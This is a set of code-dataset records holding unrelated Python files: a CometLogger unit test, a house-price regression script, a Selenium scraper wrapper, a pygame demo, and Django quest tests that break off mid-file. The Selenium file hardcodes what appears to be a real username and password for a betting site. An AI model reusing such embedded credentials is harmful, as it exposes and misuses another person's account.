"usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "orgs.models.OrgInfo", "line_number": 37, "usage_type": "name"}, {"api_name": "courses.models.CourseInfo.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "courses.models.CourseInfo.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "courses.models.CourseInfo", "line_number": 39, "usage_type": "name"}, {"api_name": "orgs.models.TeacherInfo.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "orgs.models.TeacherInfo.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "orgs.models.TeacherInfo", "line_number": 41, "usage_type": "name"}, {"api_name": "models.UserLove.objects.filter", "line_number": 44, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 44, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "models.UserLove", "line_number": 62, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 72, "usage_type": "call"}, {"api_name": "tools.decorators.login_decorator", "line_number": 29, "usage_type": "name"}, {"api_name": "forms.UserCommentForm", "line_number": 76, "usage_type": "call"}, {"api_name": "models.UserComment", "line_number": 80, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 91, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "models.UserLove.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 100, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 105, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 107, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "605026960", "text": "from unittest.mock import patch\n\nimport pytest\n\nfrom pytorch_lightning.loggers import CometLogger\nfrom pytorch_lightning.utilities.exceptions import MisconfigurationException\n\n\ndef test_comet_logger_online():\n \"\"\"Test comet online with mocks.\"\"\"\n # Test api_key given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test both given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n save_dir='test',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # 
Test neither given\n with pytest.raises(MisconfigurationException):\n CometLogger(\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test already exists\n with patch('pytorch_lightning.loggers.comet.CometExistingExperiment') as comet_existing:\n logger = CometLogger(\n experiment_key='test',\n experiment_name='experiment',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet_existing.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n previous_experiment='test'\n )\n\n comet_existing().set_name.assert_called_once_with('experiment')\n\n with patch('pytorch_lightning.loggers.comet.API') as api:\n CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n rest_api_key='rest'\n )\n\n api.assert_called_once_with('rest')\n", "sub_path": "tests/loggers/test_comet.py", "file_name": "test_comet.py", "file_ext": "py", "file_size_in_byte": 2197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 28, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 45, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.exceptions.MisconfigurationException", "line_number": 45, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 52, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 53, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 72, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "134748082", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 07:08:30 2018\r\n\r\n@author: mpagrawa\r\n\"\"\"\r\n\r\n#import house_11112018 as parent\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport sqlalchemy as sql\r\nimport statsmodels.formula.api as sm\r\nimport scipy.stats as stats\r\n\r\nfrom sklearn import preprocessing\r\n\r\nfrom sqlalchemy import create_engine\r\nengine = create_engine('sqlite://', echo=False)\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly = PolynomialFeatures(2)\r\n\r\n#%matplotlib inline\r\nsns.set_style('whitegrid')\r\n\r\ndef StartOverDf():\r\n house = pd.read_csv('kc_house_data.csv', parse_dates=['date'])\r\n del house['id']\r\n del house['lat']\r\n del house['long']\r\n return house\r\n\r\ndef AdjustedRSquare(model,X,Y):\r\n YHat = model.predict(X)\r\n n,k = X.shape\r\n sse = np.sum(np.square(YHat-Y),axis=0)\r\n sst = np.sum(np.square(Y-np.mean(Y)),axis=0)\r\n R2 = 1- sse/sst\r\n adjR2 = R2-(1-R2)*(float(k)/(n-k-1))\r\n return adjR2\r\n\r\ndef BackwardElimination(X,y,sl):\r\n columnList = X.columns.tolist() \r\n for i in range(0, len(columnList)):\r\n regressor_OLS = sm.OLS(y, X[columnList]).fit()\r\n adjR2_before = regressor_OLS.rsquared_adj \r\n maxVar = max(regressor_OLS.pvalues) \r\n if maxVar > sl:\r\n ind = regressor_OLS.pvalues[regressor_OLS.pvalues == 
max(regressor_OLS.pvalues)].index[0]\r\n columnList_new = columnList.copy()\r\n columnList_new.remove(ind)\r\n temp_OLS = sm.OLS(y, X[columnList_new]).fit()\r\n adjR2_after = temp_OLS.rsquared_adj\r\n print('before', adjR2_before)\r\n print('after', adjR2_after, '\\n')\r\n if adjR2_before > adjR2_after:\r\n return columnList\r\n else:\r\n columnList.remove(ind) \r\n return columnList\r\n\r\ndef PolyFeatureNames(featureNames):\r\n # interaction features\r\n featureNames = ['intercept'] + featureNames \r\n polyFeatureNames = []; \r\n for i,x in enumerate(featureNames):\r\n for y in featureNames[i:]:\r\n if (x == 'intercept'):\r\n polyFeatureNames.append(y)\r\n elif (x==y):\r\n polyFeatureNames.append((y+'_Square'))\r\n else:\r\n polyFeatureNames.append((x+'_'+y))\r\n return polyFeatureNames\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\n#from sklearn.grid_search import GridSearchCV\r\nfrom sklearn.cross_validation import ShuffleSplit\r\nfrom sklearn.metrics import make_scorer\r\nfrom sklearn.metrics import r2_score\r\n\r\ndef performance_metric(y_true, y_predict):\r\n score = r2_score(y_true, y_predict)\r\n return score\r\n\r\n\r\ndef fit_model(X,y):\r\n cv_sets = ShuffleSplit(X.shape[0],n_iter=10,\r\n test_size=0.20,\r\n random_state=1234)\r\n ridgeModel = Ridge()\r\n params = {'alpha':list(range(0,5)),\r\n 'solver' : ('auto', \r\n 'svd', \r\n 'cholesky', \r\n 'lsqr', \r\n 'sparse_cg', \r\n 'sag', \r\n 'saga')}\r\n scoring_func = make_scorer(performance_metric)\r\n grid = GridSearchCV(ridgeModel,params,scoring_func,cv=cv_sets)\r\n grid = grid.fit(X,y)\r\n return grid.best_estimator_\r\n\r\nhouse = StartOverDf()\r\n#plt.figure(figsize=(15,10))\r\n#sns.heatmap(house.corr(), annot=True, cmap='coolwarm')\r\nmax_date = max(house.date)\r\nhouse['Age_sold'] = house['date'].apply(lambda x: ((max_date - x).days))\r\nhouse['House_Built_Age'] = 2015-house['yr_built']\r\nhouse['House_Renovated_Age'] = 2015-house['yr_renovated']\r\nhouse['Tot_Bathrooms'] = house.bathrooms * house.bedrooms\r\nhouse['Price_Sqft'] = house.price / house.sqft_living15\r\nhouse['Price_Sqft_lot'] = house.price / house.sqft_lot15\r\ndel(house['bathrooms'])\r\nhouse.at[house.index[house.bedrooms ==33],'bedrooms'] = 3\r\nhouse.at[house.index[house.bedrooms ==11],'bedrooms'] = 3\r\n\r\n\r\nhouse= pd.get_dummies(house, columns =['view'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['grade'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['zipcode'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['condition'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['floors'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['bedrooms'], drop_first=True)\r\n# sqft_living and lot areas have changed even though house is not renovated\r\n# drop older coloumns considering 15 data as the latest and accurate\r\n\r\n\r\nX = house.drop(['price','date','sqft_living','sqft_lot','sqft_above','sqft_basement','yr_built','yr_renovated'], axis=1)\r\ny = house.price\r\n\r\n\r\n# Stats model\r\nX['intercept'] = 1\r\nres = BackwardElimination(X,y,0.05)\r\n\r\n#regressor_OLS = sm.OLS(y, X).fit()\r\n#regressor_OLS.summary()\r\n\r\n#regressor_OLS.pvalues\r\n#res.remove('intercept')\r\n\r\nXpoly = poly.fit_transform(X[res])\r\n#polyFeatureNames = PolyFeatureNames(X.columns.tolist())\r\npolyFeatureNames = PolyFeatureNames(res)\r\n#polyFeatureNames = PolyFeatureNames(['House_Renovated_Age','tot_bathrooms'])\r\n#Xpoly.shape\r\nXpolyDf = pd.DataFrame(Xpoly, columns=polyFeatureNames)\r\n#X = 
XpolyDf\r\n\r\n#zip_unique = list(set(X.zipcode))\r\n\r\n#from statsmodels.stats.multicomp import pairwise_tukeyhsd\r\n#output = pairwise_tukeyhsd(y,X.zipcode)\r\n#output.summary()\r\n#df = pd.DataFrame(output.summary())\r\n#df = pd.DataFrame(data=output._results_table.data[1:], columns=output._results_table.data[0])\r\n#df1 = df[df.reject == False]\r\n#output.plot_simultaneous()[0]\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nlm = LinearRegression()\r\nfrom sklearn.model_selection import train_test_split\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm.fit(X_train, y_train)\r\ncoefMetrics = pd.DataFrame(index=X_train.columns, data=lm.coef_)\r\nR2_train = lm.score(X_train, y_train)\r\nR2_test = lm.score(X_test, y_test)\r\ny_pred = lm.predict(X_test)\r\nadjR2_train = AdjustedRSquare(lm,X_train,y_train)\r\nadjR2_test = AdjustedRSquare(lm,X_test,y_test)\r\n\r\n\r\nfrom sklearn.linear_model import Lasso\r\nlm1 = Lasso(alpha=1, max_iter=5000)\r\nfrom sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm1.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train1 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test1 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\nfrom sklearn.linear_model import Ridge\r\nlm1 = Ridge(alpha=1,max_iter=5000, solver='svd')\r\n#from sklearn.model_selection import cross_validate as cv\r\nfrom sklearn import cross_validation as cv\r\n#from sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm1.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train2 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test2 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\n#best_estimate = fit_model(X_train,y_train)\r\n#best_estimate\r\n#Ridge(alpha=1, copy_X=True, fit_intercept=True, max_iter=None,\r\n# normalize=False, random_state=None, solver='svd', tol=0.001)\r\n#adjR2_train = 0.9439\r\n#adjR2_test = 0.9419\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "house_EDA_11112018.py", "file_name": "house_EDA_11112018.py", "file_ext": "py", "file_size_in_byte": 8094, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 24, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 27, "usage_type": 
"call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 48, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 48, "usage_type": "name"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 55, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 55, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.ShuffleSplit", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 168, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 186, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 188, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 197, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 203, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 205, "usage_type": "call"}]} +{"seq_id": "545889766", "text": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n### A basic wrapper to selenium for scraping data\n## - driver - the selenium web browser driver\n## - username - username for login\n## - password - password for login\n## - url_home - The url to navigate to when the browser is created\n## - url_login - The url to use when we login.\n## - url_post_login - The url to navigate to after login\n\n## - actions - A list of actions to do at given urls.\n\n## - get_url() - get current url\n## - set_url() - Navigate to a new url\n\n\n\n### An object that can describe anything. 
\n### It accepts any parameter to initialize,\n### including type, a variable that can be used to better describe this object\nclass AbstractObject(dict):\n\n    def __init__(self, **kwargs):\n        for key, value in kwargs.items():\n            self.__setattr__(key, value)\n\n    def __str__(self):\n        string = \"<\" + self.type + ': '\n        for variable, value in self.__dict__.items():\n            string += variable + \"=\" + str(value) + \", \"\n        return string + \">\"\n\n\n### An abstract wrapper for selenium.\n### This will allow selenium to perform basic actions,\n### for which there is a list that requires some customization, with some basic navigation.\n### Because we inherit from AbstractObject this class too can be customized and expanded very easily.\n### Adding a key to the _attrs dict will result in a new variable inside the object.\n### A named action list will allow functions to be added on the fly even after creation of an object.\nclass SeleniumHandler(AbstractObject):\n    _attrs = {\n        'driver':None, # Selenium webdriver\n        'username':'', # for login\n        'password':'', # for login\n        'url_home':'', # The site's home url\n        'url_login':'', # The url used to login to the site (sometimes can be the same as home url)\n        'url_post_login':'', # The url we want to navigate to after login\n        'nav_time':2, # How long we wait after we go to a new url\n        'actions':{}, # Custom actions called by controller (scraper.py)\n        'is_logged_in': False,\n        'login_action_name': 'Login',\n    }\n\n    def __init__(self, **kwargs):\n        for var, val in SeleniumHandler._attrs.items():\n            if var not in kwargs:\n                kwargs[var] = val\n\n        # AbstractObject.__setattr__ already stores the driver (and every other\n        # attribute), so no further initialization is needed here.\n        super(SeleniumHandler, self).__init__(**kwargs)\n\n    def add_action(self, action_class):\n        action = action_class(self)\n        self.actions[action.name] = action\n        self.__setattr__(action.name, action)\n        print(\"[+] \", action_class.__name__)\n\n    def get(self, url):\n        if (url == \"\"): return\n        self.driver.get(url)\n        time.sleep(self.nav_time)\n\n    def home(self):\n        self.get(self.url_home)\n\n    ### Call the login action only if there is one.\n    ### We can do this from the home page if this site can login from the home page.\n    ### Otherwise go to the login url if there is one.\n    def login(self, redirect = True):\n        results = None\n        if self.login_action_name not in self.actions.keys(): return results\n\n        # The action here is the login action. It is an object. 
We call its invoke() method below.\n        action = self.actions[self.login_action_name]\n\n        # Login directly if we are at the home page and this site can login from the home page\n        if self.is_home() and self.can_login_from_home():\n            results = action.invoke(post_login_redirect = redirect)\n        # Otherwise go to the login url first\n        else:\n            self.get(self.url_login)\n            results = action.invoke(post_login_redirect = redirect)\n\n        if (results is not None):\n            self.is_logged_in = True\n\n        return results\n\n    def is_home(self): return self.current_url() == self.url_home\n    def current_url(self): return self.driver.current_url\n    def can_login_from_home(self): return self.url_home == self.url_login\n\n\nclass StrikerdotHandler(SeleniumHandler):\n    def __init__(self):\n        variables = {\n            \"type\":\"Handler\",\n            'driver': webdriver.Firefox(),\n            'username': 'R1036', 'password': 'yeet3',\n            'url_home': 'http://www.strikerdot.com',\n            'url_login': 'http://www.strikerdot.com',\n            'url_post_login': \"https://www.strikerdot.com/sports.html?livebettingEZ=ready?logged=1#!\",\n        }\n        super(StrikerdotHandler, self).__init__(**variables)\n", "sub_path": "selenium_handler.py", "file_name": "selenium_handler.py", "file_ext": "py", "file_size_in_byte": 4914, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 133, "usage_type": "name"}]} +{"seq_id": "508619205", "text": "import pygame\nimport math\nimport numpy\n\nclass game:\n    def __init__(self):\n        self.running = True\n        self.size = self.width, self.height = 1280, 720\n        self.screen = pygame.display.set_mode(self.size)\n        self.bg = (192,192,192)\n\n        self.square = [[1,2],[1,4],[-1,4],[-1,2]]\n\n    def on_event(self, event):\n        if event.type == pygame.QUIT:\n            self.running = False\n\n        elif event.type == pygame.KEYDOWN:\n            if event.unicode == \"w\":\n                for point in self.square:\n                    point[1] -= 0.01\n            elif event.unicode == \"s\":\n                for point in self.square:\n                    point[1] += 0.01\n            elif event.unicode == \"d\":\n                for point in self.square:\n                    point[0] -= 0.01\n            elif event.unicode == \"a\":\n                for point in self.square:\n                    point[0] += 0.01\n\n            elif event.key == pygame.K_ESCAPE:\n                self.running = False\n\n        elif event.type == pygame.MOUSEMOTION:\n            mdir = pygame.mouse.get_rel()[0]\n            if mdir > 0:\n                for point in self.square:\n                    temp = point[0]*math.cos(0.01) - (point[1])*math.sin(0.01)\n                    point[1] = point[0]*math.sin(0.01) + (point[1])*math.cos(0.01)\n                    point[0] = temp\n            elif mdir < 0:\n                for point in self.square:\n                    temp = point[0]*math.cos(-0.01) - (point[1])*math.sin(-0.01)\n                    point[1] = point[0]*math.sin(-0.01) + (point[1])*math.cos(-0.01)\n                    point[0] = temp\n\n    def loop(self):\n        self.screen.fill(self.bg)\n        vertex = []\n\n        for edge in self.square:\n            xpos = self.width/2 + math.atan(edge[0]/edge[1])*2*self.width/math.pi\n            hpos = math.atan(1/(edge[0]**2+edge[1]**2)**0.5)*2*self.height/math.pi\n            mid = self.height/2\n            vertex += [[xpos,mid+hpos],[xpos,mid-hpos]]\n\n        vs = len(vertex)\n\n        dist = []\n        for i in range(0,4):\n            dist_x = (self.square[i][0] + self.square[(i+1)%4][0])/2\n            dist_y = (self.square[i][1] + self.square[(i+1)%4][1])/2\n            dist += [(dist_x**2 + dist_y**2)**0.5]\n\n        dist = numpy.argsort(numpy.array(dist))\n\n        for i in (2*dist[::-1]):\n            if i%4 == 0:\n                
pygame.draw.polygon(self.screen, [128,128,128], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n else:\n pygame.draw.polygon(self.screen, [96,96,96], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n \n def execute(self):\n pygame.init()\n pygame.event.set_grab(True)\n pygame.key.set_repeat(1,1)\n pygame.mouse.set_visible(False)\n \n while self.running:\n for event in pygame.event.get():\n self.on_event(event)\n \n self.loop()\n pygame.display.flip()\n \n pygame.quit()\n\nkeal = game()\nkeal.execute()\n", "sub_path": "input_demo.py", "file_name": "input_demo.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.display.set_mode", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_rel", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 36, "usage_type": "attribute"}, {"api_name": "math.cos", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 45, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 45, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 53, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 53, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 54, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.draw.polygon", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.event.set_grab", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_visible", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 87, "usage_type": "call"}]} 
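The input_demo.py record above rotates each corner of the square in place using the 2D rotation identities x' = x*cos(t) - y*sin(t), y' = x*sin(t) + y*cos(t), once per mouse-motion event. Below is a minimal standalone sketch of the same step expressed as a numpy rotation matrix; the rotate_points helper is illustrative only and not part of the original file:

import numpy as np

def rotate_points(points, theta):
    # Rotate an (n, 2) array of 2D points about the origin by theta radians.
    c, s = np.cos(theta), np.sin(theta)
    rot = np.array([[c, -s],
                    [s,  c]])
    # Row vectors are rotated by multiplying with the transposed matrix:
    # [x, y] @ rot.T == [x*c - y*s, x*s + y*c]
    return points @ rot.T

square = np.array([[1, 2], [1, 4], [-1, 4], [-1, 2]], dtype=float)
square = rotate_points(square, 0.01)  # one 0.01-radian step, as in the sample

With this form the two mouse-direction branches in the sample collapse into a single call with theta = +0.01 or -0.01.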
+{"seq_id": "214926306", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests process for creating a quest.\n\"\"\"\nfrom braces.views import LoginRequiredMixin\nfrom django import forms\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import CreateView\nfrom mock import patch, PropertyMock\nfrom characters.mixins import NoAvailableCharactersMixin\nfrom characters.models import Character\nfrom characters.tests.utils import CharacterUtils\nfrom characters.views import CharacterListView\nfrom quests.models import Quest, Post\nfrom rpg_auth.tests.utils import CreateUserMixin\nfrom world.mixins import LocationFromRequestMixin\nfrom world.models import Location\nfrom world.views import ContinentListView\n\n\nclass SelectLocationTestCase(CreateUserMixin):\n \"\"\"\n Tests that users can create quests\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectLocationTestCase, self).setUp()\n self.character_1 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_location_renders(self):\n \"\"\"\n A view must exist allowing a user to select a location to quest in.\n \"\"\"\n response = self.client.get(reverse('quests:select_location'))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, ContinentListView))\n self.assertTemplateUsed(response, 'quests/select_location.html')\n\n def test_user_must_be_logged_in_to_select_location(self):\n \"\"\"\n A user must be logged in to select the location of a quest.\n \"\"\"\n self.client.logout()\n response = self.client.get(reverse('quests:select_location'))\n self.assertRedirects(response, '{0}?next={1}'.format(\n reverse('rpg_auth:login'), reverse('quests:select_location')\n ))\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_available_characters.return_value.count.return_value = 0\n response = self.client.get(reverse('quests:select_location'))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass SelectCharacterTestCase(CreateUserMixin):\n \"\"\"\n Tests that if the user has selected a location they can also select a character.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectCharacterTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_character_renders(self):\n \"\"\"\n Tests that given a valid location, a user's characters are listed.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CharacterListView))\n self.assertTemplateUsed(response, 'quests/select_character.html')\n self.assertEquals(response.context['location'], self.location_1)\n\n def test_invalid_location_gives_404(self):\n \"\"\"\n Tests if an invalid location is given a 404 is raised.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': 'fake-slug'}))\n 